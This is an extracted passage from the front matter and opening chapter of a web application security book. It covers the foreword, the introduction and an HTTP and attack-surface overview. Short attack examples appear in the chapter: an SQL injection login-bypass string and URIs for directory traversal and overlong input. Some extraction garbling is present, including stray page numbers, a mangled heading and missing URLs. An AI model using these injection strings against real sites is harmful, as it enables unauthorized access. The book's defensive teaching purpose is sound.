. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 409 References & Further Reading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 410 ▼ A Web Application Security Checklist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 413 ▼ B Web Hacking Tools and Techniques Cribsheet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 419 ▼ Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 429 FOREWORD “If ignorant of both your enemy and yourself, you are certain in every battle to be in peril.” —Sun Tzu, The Art of War There is no escaping the reality that businesses live on the Web today. From banks to bookstores, from auctions to games, the Web is the place where most businesses ply their trade. For consumers, the Web has become the place where they do the majority of their business as well. For example, nearly 50 percent of all retail music sales in the United States happen online today; the market for virtual merchandise in online games will top $1.5B this year; and, by some estimates, over 45 percent of U.S. adults use the Internet exclusively to do their banking. With the growing popularity of web-enabled smart phones, much of this online commerce is now available to consumers anytime and anywhere. By any estimation, business on the Web is an enormous part of the economy and growing rapidly. But along with this growth has come the uncomfortable realization that the security of this segment of commerce is not keeping pace. In the brick and mortar world, business owners have spent decades encountering and learning to mitigate threats. They have had to deal with break-ins, burglary, armed robbery, counterfeit currency, fraudulent checks, and scams of all kinds. In the brick and mortar world, however, businesses have a constrained, easily defined perimeter to their business, and, in most cases, a reasonably constrained population of threats. They have, over time, learned to apply an increasingly mature set of practices, tools, and safeguards to secure their businesses against these threats. On the Web, the story is quite different. Businesses on the Web have been around for less than 20 years, and many of the hard lessons that they’ve learned in the physical world of commerce are only recently beginning to surface for web-based commerce. Just as in the physical world, where there is money or valuable assets, you will always find a certain subset of the population up to no good and attempting to capitalize on those assets. However, unlike in the physical world, in the world of e-commerce, businesses are faced with a dizzying array of technologies and concepts that most leaders find difficult, if not impossible, to comprehend. In addition, the perimeter of their assets is often not well understood, and xvii xviii Hacking Exposed Web Applications the population of potential threats can span the entire globe. While any executive at a bank can appreciate the issues of physical access to assets, the security provided by a well-designed bank vault, the mitigation provided by a dye pack in a money drawer, or the deterrent effect of an armed guard in a lobby, those same executives are frequently baffled by the impact of something called cross-site scripting, or how something called SQL injection could pose such a threat to their business. In many cases, even the “experts” employed by these businesses to build their online commerce sites, the web developers themselves, are barely aware of the extent of the threats to their sites, the fragility of the code they write, or the lengths to which online attackers will go to gain access to their systems. Upon this lopsided battlefield of online commerce and crime, a dedicated cadre of professionals struggles to educate businesses about the threats, improve the awareness of developers about how to make their code resilient to attack, and are constantly trying to understand the ever-changing tactics and tools employed by the attack community. The authors of Hacking ExposedTM Web Applications, Third Edition, represent some of the most experienced and most knowledgeable of this group, and this book represents their latest attempt to share their knowledge and experience with us all. Whether you are a business leader attempting to understand the threat space for your business, an engineer tasked with writing the code for those sites, or a security engineer attempting to identify and mitigate the threats to your applications, this book will be an invaluable weapon in your arsenal. As Sun Tzu advises us, by using this book you will have a much clearer understanding of yourself—and your enemy—and in time you will reduce the risk to your business. —Chris Peterson, August 2010 Senior Director of Application Security, Zynga Game Network Former Director of Security Assurance, Microsoft Corporation ACKNOWLEDGMENTS This book would not have existed but for the support, encouragement, input, and contributions of many people. We hope we have covered them all here and apologize for any omissions, which are due to our oversight alone. First and foremost, many thanks to our families and friends for supporting us through many months of demanding research and writing. Their understanding and support were crucial to us completing this book. We hope that we can make up for the time we spent away from them to complete yet another book project (really, we promise this time!). Second, we would like to thank our colleagues Hernan Ochoa, Justin Hays, Carl Livitt, and Rob Ragan for their valuable contributions to this book. Robert Hensing also deserves special thanks for his razor-sharp technical review and several substantial contributions of his own. Key contributors to prior editions remain great influencers of the work in this edition and deserve special recognition. Caleb Sima (co-author on the Second and Third Editions) continues to inspire new thinking in the web application security space, and Mike Shema (co-author on the First Edition) continues to work tirelessly on refining many of the ideas herein into automated routines. Of course, big thanks go again to the tireless McGraw-Hill production team who worked on the book, including our acquisitions editor Megg Morin, Hacking Exposed “editor emeritus” Jane Brownlow, acquisitions coordinator Joya Anthony, who kept things on track, art production consultant Melinda Lytle, and project editor LeeAnn Pickrell, who kept a cool head even in the face of weekend page proofing and other injustices that the authors saddled her with. We’d also like to acknowledge the many people who provided input and guidance on the many topics discussed in this book, including Kevin Rich, Kevin Nassery, Tab Pierce, Mike DeLibero, and Cyrus Gray of Consciere. In addition, we extend our heartfelt appreciation to Fran Brown, Liz Lagman, Steve Schwartz, Brenda Larcom, Shyama Rose, and Dan of Stach & Liu for their unflagging support of our efforts. Thanks go also to Chris Peterson for his feedback on the manuscript and his outstanding comments in the Foreword, as well as our colleagues who generously xix xx Hacking Exposed Web Applications provided comments on the manuscript for publication: Chad Greene, Robert Hansen, Cem Paya, Andrew Stravitz, and Ken Swanson. As always, we’d like to tip our hats to the many perceptive and creative hackers worldwide who continue to innovate and provide the raw material for Hacking Exposed, especially those who correspond regularly. And finally, a tremendous “Thank You” to all of the readers of the Hacking Exposed series, whose ongoing support makes all of the hard work worthwhile. —Joel, Vinnie, and Caleb INTRODUCTION Way back in 1999, the first edition of Hacking Exposed introduced many people to the ease with which computer networks and systems are broken into. Although there are still many today who are not enlightened to this reality, large numbers are beginning to understand the necessity for firewalls, secure operating system configuration, vendor patch maintenance, and many other previously arcane fundamentals of information system security. Unfortunately, the rapid evolution brought about by the Internet has already pushed the goalposts far upfield. Firewalls, operating system security, and the latest patches can all be bypassed with a simple attack against a web application. Although these elements are still critical components of any security infrastructure, they are clearly powerless to stop a new generation of attacks that are increasing in frequency and sophistication all the time. Don’t just take our word for it. Gartner Group says 75 percent of hacks are at the web app level and, that out of 300 audited sites, 97 percent are vulnerable to attack. The WhiteHat Website Security Statistics Report, Fall 2009, says 83 percent of web sites have had at least one serious vulnerability, 64 percent of web sites currently have at least one, and found a 61 percent vulnerability resolution-rate with 8,902 unresolved issues remaining (sample size: 1,364 sites). Headlines for devastating attacks are now commonplace: the Identity Theft Resource Center, ITRC, says there have been at least 301 security breaches resulting in the exposure of more than 8.2 million records throughout the first six months of 2010). The estimated total number of sensitive digital records compromised by security breaches is climbing to stratospheric heights: over 900 million records alone from the sample of over 900 breaches across 6 trailing years in the Verizon Business 2010 Data Breach Investigations Report. We cannot put the horse of Internet commerce back in the barn and shut the door. There is no other choice left but to draw a line in the sand and defend the positions staked out in cyberspace by countless organizations and individuals. For anyone who has assembled even the most rudimentary web site, you know this is a daunting task. Faced with the security limitations of existing protocols like HTTP, as well as the ever-accelerating pace of technological change, including XML Web Services, xxi xxii Hacking Exposed Web Applications AJAX, RSS, mobile applications, and user-generated content, the act of designing and implementing a secure web application can present a challenge of Gordian complexity. MEETING THE WEB APP SECURITY CHALLENGE We show you how to meet this challenge with the two-pronged approach adapted from the original Hacking Exposed. First, we catalog the greatest threats your web application will face and explain how they work in excruciating detail. How do we know these are the greatest threats? Because we are hired by the world’s largest companies to break into their web applications, and we use attacks based on these threats daily to do our jobs. And we’ve been doing it for over 30 years (combined), researching the most recently publicized hacks, developing our own tools and techniques, and combining them into what we think is the most effective methodology for penetrating web application (in)security in existence. Once we have your attention by showing you the damage that can be done, we tell you how to prevent each and every attack. Deploying a web application without understanding the information in this book is roughly equivalent to driving a car without seat belts—down a slippery road, over a monstrous chasm, with no brakes, and the throttle jammed on full. HOW THIS BOOK IS ORGANIZED This book is the sum of chapters, each of which describes one aspect of the Hacking Exposed Web Application attack methodology. This structure forms the backbone of this book, for without a methodology, this would be nothing but a heap of information without context or meaning. It is the map by which we will chart our progress throughout the book. Chapter 1: Hacking Web Apps 101 In this chapter, we take a broad overview of web application hacking tools and techniques while showing concrete examples. Buckle your seatbelt, Dorothy, because Kansas is going bye-bye. Chapter 2: Profiling The first step in any methodology is often one of the most critical, and profiling is no exception. This chapter illustrates the process of reconnaissance in prelude to attacking a web application and its associated infrastructure. Introduction xxiii Chapter 3: Hacking Web Platforms No application can be secured if it’s built on a web platform that’s full of security holes— this chapter describes attacks, detection evasion techniques, and countermeasures for the most popular web platforms, including IIS, Apache, PHP, and ASP.NET. Chapter 4: Attacking Web Authentication This chapter covers attacks and countermeasures for common web authentication mechanisms, including password-based, multifactor (e.g., CAPTCHA), and online authentication services like Windows Live ID. Chapter 5: Attacking Web Authorization See how to excise the heart of any web application’s access controls through advanced session analysis, hijacking, and fixation techniques. Chapter 6: Input Injection Attacks From cross-site scripting to SQL injection, the essence of most web attacks is unexpected application input. In this chapter, we review the classic categories of malicious input, from overlong input (like buffer overflows) to canonicalization attacks (like the infamous dot-dot-slash), and reveal the metacharacters that should always be regarded with suspicion (including angle brackets, quotes, single quote, double dashes, percent, asterisk, underscore, newline, ampersand, pipe, and semicolon), beginner-to-advanced SQL injection tools and techniques, plus stealth-encoding techniques and inputvalidation/output-encoding countermeasures. Chapter 7: Attacking XML Web Services Don’t drop the SOAP, because this chapter will reveal how web services vulnerabilities are discovered and exploited through techniques including WSDL disclosure, input injection, external entity injection, and XPath injection. Chapter 8: Attacking Web Application Management If the front door is locked, try the back! This chapter reveals the most common web application management attacks against remote server management, web content management/authoring, admin misconfigurations, and developer-driven mistakes. Chapter 9: Hacking Web Clients Did you know that your web browser is actually an effective portal through which unsavory types can enter directly into your homes and offices? Take a tour of the nastiest web browser exploits around, and then follow our “10 Steps to a Safer Internet Experience” (along with dozens of additional countermeasures listed in this chapter) so you can breathe a little easier when you browse. xxiv Hacking Exposed Web Applications Chapter 10: The Enterprise Web Application Security Program We take a brief departure from zero-knowledge/black-box analysis in this chapter to explain the advantages of a robust full-knowledge/white-box web application security assessment methodology, including threat modeling, code review, dynamic web application scanning, security testing, and integrating security into the overall web application development lifecycle and IT operations. This chapter is aimed at IT operations and development staff for medium-to-large enterprises who need to implement our web application assessment methodology so it is scalable, consistent, and delivers acceptable return on investment. Last but not least, we cap the book off with a series of useful appendices that include a comprehensive “Web Application Security Checklist” and our “Web Hacking Tools and Techniques Cribsheet.” Modularity, Organization, and Accessibility Clearly, this book could be read from start to finish for a soup-to-nuts portrayal of web application penetration testing. However, like Hacking Exposed, we have attempted to make each chapter stand on its own so the book can be digested in modular chunks, suitable to the frantic schedules of our target audience. Moreover, we have strictly adhered to the clear, readable, and concise writing style that readers overwhelmingly responded to in Hacking Exposed. We know you’re busy, and you need the straight scoop without a lot of doubletalk and needless jargon. As a reader of Hacking Exposed once commented, “Reads like fiction, scares like hell!” We think you will be just as satisfied reading from beginning to end as you would piece by piece, but it’s built to withstand either treatment. Chapter Summaries and References & Further Reading Two features appear at the end every chapter in this book: a “Summary” and “References & Further Reading” section. The “Summary” is exactly what it sounds like—a brief synopsis of the major concepts covered in the chapter, with an emphasis on countermeasures. We would expect that if you read each chapter’s summary, you would know how to harden a web application to just about any form of attack. The “References & Further Reading” section in each chapter includes URLs, ISBN numbers, and any other bits of information necessary to locate each and every item referenced in the chapter, including vendor security bulletins and patches, third-party advisories, commercial and freeware tools, web hacking incidents in the news, and general background reading that amplifies or expands on the information presented in the chapter. You will thus find few URLs within the text of the chapters themselves—if you need to find something, turn to the end of the chapter, and it will be there. We hope this consolidation of external references into one container improves your overall enjoyment of the book. Introduction xxv The Basic Building Blocks: Attacks and Countermeasures As with Hacking Exposed, the basic building blocks of this book are the attacks and countermeasures discussed in each chapter. The attacks are highlighted here as they are throughout the Hacking ExposedTM series: This Is an Attack Icon Highlighting attacks like this makes it easy to identify specific penetration-testing tools and methodologies and points you right to the information you need to convince management to fund your new security initiative. Many attacks are also accompanied by a Risk Rating, scored exactly as in Hacking Exposed, as shown here: Popularity: Simplicity: Impact: Risk Rating: The frequency of use in the wild against live targets: 1 being most rare, 10 being widely used. The degree of skill necessary to execute the attack: 10 being little or no skill, 1 being seasoned security programmer. The potential damage caused by successful execution of the attack: 1 being revelation of trivial information about the target, 10 being superuser account compromise or equivalent. The preceding three values are averaged to give the overall risk rating and rounded to the next highest whole number. We have also followed the Hacking Exposed line when it comes to countermeasures, which follow each attack or series of related attacks. The countermeasure icon remains the same: This Is a Countermeasure Icon This should be a flag to draw your attention to critical-fix information. Other Visual Aids We’ve also made prolific use of visually enhanced icons to highlight those nagging little details that often get overlooked. xxvi Hacking Exposed Web Applications ONLINE RESOURCES AND TOOLS Web app security is a rapidly changing discipline, and we recognize that the printed word is often not the most adequate medium to keep current with all of the new happenings in this vibrant area of research. Thus, we have implemented a web site that tracks new information relevant to topics discussed in this book, errata, and a compilation of the public-domain tools, scripts, and techniques we have covered throughout the book. That site address is It also provides a forum to talk directly with the authors via e-mail: We hope that you return to the site frequently as you read through these chapters to view any updated materials, gain easy access to the tools that we mentioned, and otherwise keep up with the ever-changing face of web security. Otherwise, you never know what new developments may jeopardize your applications before you can defend yourself against them. A FINAL WORD TO OUR READERS We’ve poured our hearts, minds, and combined experience into this book, and we sincerely hope that all of our effort translates to tremendous time savings for those of you responsible for securing web applications. We think you’ve made a courageous and forward-thinking decision to stake your claim on a piece of the Internet—but, as you will discover in these pages, your work only begins the moment the site goes live. Don’t panic—start turning the pages and take great solace that when the next big web security calamity hits the front page, you won’t even bat an eye. 1 HacAkpipnsg1W01eb 2 Hacking Exposed Web Applications This chapter provides a brief overview of the “who, what, when, where, how, and why” of web application hacking. It’s designed to set the stage for the subsequent chapters of the book, which will delve much more deeply into the details of web application attacks and countermeasures. We’ll also introduce the basic web application hacking toolset, since these tools will be used throughout the rest of the book for numerous purposes. WHAT IS WEB APPLICATION HACKING? We’re not going to waste much time defining web application—unless you’ve been hiding under a rock for the last ten years, you likely have firsthand experience with dozens of web applications (Google,, Hotmail, and so on). For a more in-depth background, look up “web application” on We’re going to stay focused here and cover purely security-relevant items as quickly and succinctly as possible. We define a web application as one that is accessed via the HyperText Transfer Protocol, or HTTP (see “References & Further Reading” at the end of this chapter for background reading on HTTP). Thus, the essence of web hacking is tampering with applications via HTTP. There are three simple ways to do this: • Directly manipulating the application via its graphical web interface • Tampering with the Uniform Resource Identifier, or URI • Tampering with HTTP elements not contained in the URI GUI Web Hacking Many people are under the impression that web hacking is geeky technical work best left to younger types who inhabit dark rooms and drink lots of Mountain Dew. Thanks to the intuitive graphical user interface (GUI, or “gooey”) of web applications, this is not necessarily so. Here’s how easy web hacking can be. In Chapter 6, we’ll discuss one of the most devastating classes of web app attacks: SQL injection. Although its underpinnings are somewhat complex, the basic details of SQL injection are available to anyone willing to search the Web for information about it. Such a search usually turns up instructions on how to perform a relatively simple attack that can bypass the login page of a poorly written web application, inputting a simple set of characters that causes the login function to return “access granted”—every time! Figure 1-1 shows how easily this sort of attack can be implemented using the simple GUI provided by a sample web application called Hacme Bank from Foundstone, Inc. Some purists are no doubt scoffing at the notion of performing “true” web app hacking using just the browser, and sure enough, we’ll describe many tools later in this chapter and throughout this book that vastly improve upon the capabilities of the basic web browser, enabling industrial-strength hacking. Don’t be too dismissive of the browser, however. In our combined years of web app hacking experience, we’ve Chapter 1: Hacking Web Apps 101 3 Figure 1-1 Entering the string ‘OR 1=1-- bypasses the login screen for Foundstone’s sample Hacme bank application. Yes, it can be this easy! determined it’s really the basic logic of the application that hackers are trying to defeat, no matter what tools they use to do it. In fact, some of the most elegant attacks we’ve seen involved only a browser. Even better, such attacks are also likely to provide the greatest motivation to the web application administrator/developer/manager/executive to fix the problem. There is usually no better way of demonstrating the gravity of a vulnerability than by illustrating how to exploit it with a tool that nearly everyone on the planet is familiar with. URI Hacking For those of you waiting for the more geeky technical hacking stuff, here we go. Anyone who’s used a computer in the last five years would instantly recognize the most common example of a Uniform Resource Identifier—it’s the string of text that appears in the address bar of your favorite browser when you surf the Web, the thing that usually looks something like “”. From a more technical perspective, RFC 3986 describes the structure and syntax of URIs (as well as subcategories including the more commonly used term Uniform Resource Locator, URL). Per RFC 3986, URIs are comprised of the following pieces: scheme://authority/path?query 4 Hacking Exposed Web Applications Translating this into more practical terms, the URI describes a protocol (scheme) for accessing a resource (path) or application (query) on a server (authority). For web applications, the protocol is almost invariably HTTP (the major exception being the “secure” version of HTTP, called HTTPS, in which the session data is protected by either the SSL or TLS protocols; see “References & Further Reading” for more information). Standard HTTPS (without client authentication) does nothing for the overall security of a web application other than to make it more difficult to eavesdrop on or interfere with the traffic between a client and server. The server is one or more computers running HTTP software (usually specified by its DNS name, like, the path describes the hierarchy of folders or directories where application files are located, and the query includes the parameters that need to be fed to application executables stored on the server(s). Everything to the right of the “?” in a URI is called the query string. The HTTP client (typically a web browser) simply requests these resources, and the server responds. We’ve all seen this performed a million times by our favorite web browser, so we won’t belabor the point. Here are some concrete examples: http://server/file.html http://server/folder/application?parameter1 value1¶meter2 value2 foo&user joel As we noted earlier, web hacking is as simple as manipulating the URI in clever ways. Here are some simple examples of such manipulation: https://server/folder/../../../../cmd.exe http://server/folder/application?parameter1 aaaaa...256 a's...] http://server/folder/application?parameter1 If you can guess what each of these attacks might do, then you’re practically an expert web hacker already! If you don’t quite get it yet, we’ll demonstrate graphically in a moment. First, we have a few more details to clarify. Methods, Headers, and Body A bit more is going on under the covers than the URI lets on (but not much!). HTTP is a stateless request-response protocol. In addition to the information in the URI (everything to the right of the protocol://domain), HTTP also conveys the method used in the request, protocol headers, and the data carried in the body. None of these are visible within the URI, but they are important to understanding web applications. HTTP methods are the type of action performed on the target resource. The HTTP RFC defines a handful of methods, and the Web Distributed Authoring and Versioning Chapter 1: Hacking Web Apps 101 5 (WebDAV) extension to HTTP defines even more. But most web applications use just two: GET and POST. GET requests information. Both GET and POST can send information to the server—with one important difference: GET leaves all the data in the URI, whereas POST places the data in the body of the request (not visible in the URI). POST is generally used to submit form data to an application, such as with an online shopping application that asks for name, shipping address, and payment method. A common misunderstanding is to assume that because of this lack of visibility, POST somehow protects data better than GET. As we’ll demonstrate endlessly throughout this book, this assumption is generally faulty (although sending sensitive information on the query string using GET does open more possibilities for exposing the data in various places, including the client cache and web server logs). HTTP headers are generally used to store additional information about the protocollevel transaction. Some security-relevant examples of HTTP headers include • Authorization Defines whether certain types of authentication are used with the request, which doubles as authorization data in many instances (such as with Basic authentication). • Cache-control Defines whether a copy of the request should be cached on intermediate proxy servers. • Referer (The misspelling is deliberate, per the HTTP RFC.) Lists the source URI from which the browser arrived at the current link. Sometimes used in primitive, and trivially defeatable, authorization schemes. • Cookies Commonly used to store custom application authentication/session tokens. We’ll talk a lot about cookies in this book. Here’s a glimpse of HTTP “under the covers” provided by the popular netcat tool. We first connect to the server on TCP port 80 (the standard port for HTTP; HTTPS is TCP 443), and then we request the /test.html resource. The URI for this request would be [] 80 (http) open GET /test.html HTTP/1.0 HTTP/1.1 200 OK Date: Mon, 04 Feb 2002 01:33:20 GMT Server: Apache/1.3.22 (Unix) Connection: close Content-Type: text/html TEST.FOOetc. In this example, it’s easy to see the method (GET) in the request, the response headers (Server: and so on), and response body data ( and so on). Generally, hackers don’t need to get to this level of granularity with HTTP in order to be proficient—they just use off-the-shelf tools that automate all this low-level work and expose it for manipulation if required. We’ll illustrate this graphically in the upcoming section on “how” web applications are attacked. 6 Hacking Exposed Web Applications Resources Typically, the ultimate goal of the attacker is to gain unauthorized access to web application resources. What kinds of resources do web applications hold? Although they can have many layers (often called “tiers”), most web applications have three: presentation, logic, and data. The presentation layer is usually a HyperText Markup language (HTML) page, either static or dynamically generated by scripts. These pages don’t usually contain information of use to attackers (at least intentionally; we’ll see several examples of exceptions to this rule throughout this book). The same could be said of the logic layer, although often web application developers make mistakes at this tier that lead to compromise of other aspects of the application. At the data tier sits the juicy information, such as customer data, credit card numbers, and so on. How do these tiers map to the URI? The presentation layer usually is comprised of static HTML files or scripts that actively generate HTML. For example: http://server/file.html (as static HTML file) http://server/script.php (a HyperText Preprocessor, or PHP, script) http://server/script.asp (a Microsoft Active Server Pages, or ASP script) http://server/script.aspx (a Microsoft ASP.NET script) Dynamic scripts can also act as the logic layer, receiving input parameters and values. For example: http://server/script.php?input1 foo&input2 bar http://server/script.aspx?date friday&time 1745 Many applications use separate executables for this purpose, so instead of script files you may see something like this: http://server/app?input1 foo&input2 bar There are many frameworks for developing tier-2 logic applications like this. Some of the most common include Microsoft’s Internet Server Application Programming Interface (ISAPI) and the public Common Gateway Interface (CGI) specification. Whatever type of tier-2 logic is implemented, it almost invariably needs to access the data in tier 3. Thus, tier 3 is typically a database of some sort, usually a SQL variant. This creates a whole separate opportunity for attackers to manipulate and extract data from the application, as SQL has its own syntax that is often exposed in inappropriate ways via the presentation and logic layers. We will graphically illustrate this in Chapter 6 on input injection attacks. Authentication, Sessions, and Authorization HTTP is stateless—no session state is maintained by the protocol itself. That is, if you request a resource and receive a valid response, then request another, the server regards this as a wholly separate and unique request. It does not maintain anything like a session Chapter 1: Hacking Web Apps 101 7 or otherwise attempt to maintain the integrity of a link with the client. This also comes in handy for attackers, as they do not need to plan multistage attacks to emulate intricate session maintenance mechanisms—a single request can bring a web application to its knees. Even better, web developers have attempted to address this shortcoming of the basic protocol by bolting on their own authentication, session management, and authorization functionality, usually by implementing some form of authentication and then stashing authorization/session information in a cookie. As you’ll see in Chapter 4 on authentication, and Chapter 5 on authorization (which also covers session management), this has created fertile ground for attackers to till, over and over again. The Web Client and HTML Following our definition of a web application, a web app client is anything that understands HTTP. The canonical web application client is the web browser. It “speaks” HTTP (among other protocols) and renders HyperText Markup Language (HTML), among other markup languages. Like HTTP, the web browser is also deceptively simple. Because of the extensibility of HTML and its variants a great deal of functionality can be embedded within seemingly static web content. For example, embedding executable JavaScript in HTML is this simple: Copy this text to a file named “test.html” and launch it in your browser to see what this code does (note that newer browser versions will first prompt the user to allow scripting). Many other dangerous payloads can be embedded in HTML; besides scripts, ActiveX programs, remote image “web bugs,” and arbitrary Cascading Style Sheet (CSS) styles can be used to perform malicious activities on the client, using only humble ASCII as we’ve just illustrated. Of course, as many attackers have figured out, simply getting the end user to click a URI can give the attacker complete control of the victim’s machine as well. This again demonstrates the power of the URI, but from the perspective of the web client. Don’t forget that those innocuous little strings of text are pointers to executable code! Finally, as we’ll describe in the next section, new and powerful “Web 2.0” technologies like AJAX and RSS are only adding to the complexity of the input that web clients are being asked to parse. And the evolution of web technologies will continue to expand the attack surface for the foreseeable future, as updates like HTML5, WebGL, and NaCL readily indicate (more information on these technologies can be found in “References & Further Reading” at the end of this chapter). 8 Hacking Exposed Web Applications Suffice to say, the client side of the web application security story is receiving even more attention than the server side lately. As server administrators have become more savvy to web app attacks and hardened their posture, the attack community has unsurprisingly refocused their attention on the client, where less-savvy end users often provide easier targets. Compound this with the increasing proliferation of client-side technologies including Rich Internet Applications (RIA), User-Generated Content (UGC), AJAX, and mobile device “app stores,” and you can easily see a perfect storm developing where end users are effectively surrounded by an infinitely vulnerable software stack that leaves them utterly defenseless. We’ll talk more about the implications of all this in Chapter 9. Other Protocols HTTP is deceptively simple—it’s amazing how much mileage creative people have gotten out of its basic request/response mechanisms. However, HTTP is not always the best solution to problems of application development, and thus still more creative people have wrapped the basic protocol in a diverse array of new dynamic functionality. One of the most significant additions in recent memory is Web Distributed Authoring and Versioning (WebDAV). WebDAV is defined in RFC 4918, which describes several mechanisms for authoring and managing content on remote web servers. Personally, we don’t think this is a good idea, as a protocol that, in its default form, can write data to a web server leads to nothing but trouble, a theme we’ll see time and again in this book. Nevertheless, WebDAV has become widely deployed in diverse products ranging from Microsoft clients and servers (e.g., SharePoint) to open source products like Alfresco, so a discussion of its security merits is probably moot at this point. More recently, the notion of XML-based web services has become popular. Although very similar to HTML in its use of tags to define document elements, the eXtensible Markup Language (XML) has evolved to a more behind-the-scenes role, defining the schema and protocols for communications between applications themselves. The Simple Object Access Protocol (SOAP) is an XML-based protocol for messaging and RPC-style communication between web services. We’ll talk at length about web services vulnerabilities and countermeasures in Chapter 7. Some other interesting protocols include Asynchronous JavaScript and XML (AJAX) and Really Simple Syndication (RSS). AJAX is a novel programming approach to web applications that creates the experience of “fat client” applications using lightweight JavaScript and XML technologies. Some have taken to calling AJAX the foundation of “Web 2.0.” For a good example of the possibilities here, check out software/192203330. We’ve already noted the potential security issues with executable content on clients and point again to Chapter 9 for deep coverage. RSS is a lightweight XML-based mechanism for “feeding” dynamically changing “headlines” between web sites and clients. The most visible example of RSS in action is the “Feed Headlines” gadget that can be configured to provide scrolling news headlines/ hyperlinks on the desktop of Windows Vista and later systems. The security implications of RSS are potentially large—it accepts arbitrary HTML from numerous sources and blindly republishes the HTML. As you saw in the earlier discussion of the dangerous Chapter 1: Hacking Web Apps 101 9 payloads that HTML can carry, this places a much greater aggregate burden on web browsers to behave safely in diverse scenarios. Compounding the dangers of the technologies discussed so far is the broader trend of user-generated content (UGC). To meet the 24/7 demands for fresh material in the online world, many new and traditional media organizations are shrewdly sourcing more and more of their content from end users. Examples include discussion boards, blogs, wikis, social networking sites, photo and video sharing applications, customer review sites, and many more. This trend greatly expands the universe of content authors, and thus the potential for encountering malicious or exploitable material increases in parallel. AJAX, RSS, and UGC present a broad challenge to one of the initial design principles of web applications, which primarily anticipated a simple relationship between a single client and a single web site (i.e., a domain, like This security model is sometimes referred to as the same-origin policy, historically attributed to early versions of the Netscape Navigator web browser. As web applications strive to integrate more rich functionality from a variety of sources within a single browser—a concept sometimes referred to as a mashup—the old same-origin policy built into early browsers is beginning to show its age, and agile programmers (pun intended) are developing ways to sidestep the old-school security model in the name of bigger and better functionality. New security mechanisms, such as the HTTP “Origin” header, are being implemented to provide a more robust framework for cross-site authorization, and so the arms race between attacks and countermeasures continues. WHY ATTACK WEB APPLICATIONS? The motivations for hacking are numerous and have been discussed at length for many years in a variety of forums. We’re not going to rehash many of those conversations, but we do think it’s important to point out some of the features of web applications that make them so attractive to attackers. Understanding these factors leads to a much clearer perspective on what defenses need to be put in place to mitigate risk. • Ubiquity Web applications are almost everywhere today and continue to spread rapidly across public and private networks. Web hackers are unlikely to encounter a shortage of juicy targets anytime soon. • Simple techniques Web app attack techniques are fairly easily understood, even by the layperson, since they are mostly text-based. This makes manipulating application input fairly trivial. Compared to the knowledge required to attack more complex applications or operating systems (for example, crafting buffer overflows), attacking web apps is a piece of cake. • Anonymity The Internet still has many unaccountable regions today, and it is fairly easy to launch attacks with little fear of being traced. Web hacking in particular is easily laundered through (often unwittingly) open HTTP/S proxies that remain plentiful on the ‘Net as we write this. Sophisticated hackers 10 Hacking Exposed Web Applications will route each request through a different proxy to make things even harder to trace. Arguably, this remains the primary reason for the proliferation of malicious hacking, because this anonymity strips away one of the primary deterrents for such behavior in the physical world (i.e., being caught and punished). • Bypasses firewalls Inbound HTTP/S is permitted by most typical firewall policies (to be clear, this is not a vulnerability of the firewall—it is an administrator-configured policy). Even better (for attackers, that is), this configuration is probably going to increase in frequency as more and more applications migrate to HTTP. You can already see this happening with the growing popularity of sharing family photos via the Web, personal blogs, oneclick “share this folder to the web” features on PCs, and so on. • Custom code With the proliferation of easily accessible web development platforms like ASP.NET and LAMP (Linux/Apache/MySQL/PHP), most web applications are assembled by developers who have little prior experience (because, once again, web technology is so simple to understand, the “barriers to entry” are quite low). • Immature security HTTP doesn’t even implement sessions to separate unique users. The basic authentication and authorization plumbing for HTTP was bolted on years after the technology became popular and is still evolving to this day. Many developers code their own and get it wrong (although this is changing with the increasing deployment of common off-the-shelf web development platforms that incorporate vetted authorization/session management). • Constant change Usually a lot of people constantly “touch” a web application: developers, system administrators, and content managers of all stripes (we’ve seen many firms where the marketing team has direct access to the production web farm!). Very few of these folks have adequate security training and yet are empowered to make changes to a complex, Internetfacing web application on a constant (we’ve seen hourly!) basis. At this level of dynamism, it’s hard to adhere to a simple change management process, let alone ensure that security policy is enforced consistently. • Money Despite the hiccups of the dot-com era, it’s clear that e-commerce over HTTP will support many lucrative businesses for the foreseeable future. Not surprisingly, recent statistics indicate that the motivation for web hacking has moved from fame to fortune, paralleling the maturation of the Web itself. Increasingly, authorities are uncovering organized criminal enterprises built upon for-profit web app hacking. Whether through direct break-ins to web servers, fraud directed against web end users (aka phishing), or extortion using denial of service, the unfortunate situation today is that web crime pays. Chapter 1: Hacking Web Apps 101 11 WHO, WHEN, AND WHERE? We’re aching to get to “how,” but to complete our theme, let’s devote a couple of sentences to the “who, when, and where” of web app attacks. As with “why,” defining who attacks web applications is like trying to hit a moving target. Bored teenagers out of school for the summer probably contributed heavily to the initial popularity of web hacking, waging turf wars through website defacement. As we noted earlier, web hacking is now a serious business: organized criminals are getting into web hacking big time and making a profit. Answering “when” and “where” web applications are attacked is initially simple: 24/7, everywhere (even internal networks!). Much of the allure of web apps is their “always open to the public” nature, so this obviously exposes them to more or less constant risk. More interestingly, we could talk about “where” in terms of “at what places” are web applications attacked. In other words, where are common web app security weak spots? Weak Spots If you guessed “all over,” then you are familiar with the concept of the trick question, and you are also correct. Here is a quick overview of the types of attacks that are typically made against each component of web apps that we’ve discussed so far: • Web platform Web platform software vulnerabilities, including underlying infrastructure like the HTTP server software (for example, IIS or Apache) and the development framework used for the application (for example, ASP.NET or PHP). See Chapter 3. • Web application Attacks against authentication, authorization, site structure, input validation, application logic, and management interfaces. Covered primarily in Chapters 4 through 8. • Database Running privileged commands via database queries and query manipulation to return excessive datasets. The most devastating attack here is SQL injection, which will be tackled in Chapter 6. • Web client Active content execution, client software vulnerability exploitation, cross-site scripting errors, and fraud-like phishing. Web client hacking is discussed in Chapter 9. • Transport Eavesdropping on client-server communications and SSL redirection. We don’t cover this specifically in this book since it is a generic communications-layer attack and several extensive write-ups are available on the Web. • Availability Often overlooked in the haste to address more sensational “hacking” attacks, denial of service (DoS) is one of the greatest threats any publicly accessible web application will face. Making any resource available to the public presents challenges, and this is even more true in the online world, where distributed bot armies can be marshaled by anonymous attackers to 12 Hacking Exposed Web Applications unleash unprecedented storms of requests against any Internet target. This edition does not focus a specific chapter on DoS attacks and countermeasures, but instead weaves discussion of capacity starvation attacks and defensive programming approaches throughout the book. A few reliable statistics are available about what components of web applications are 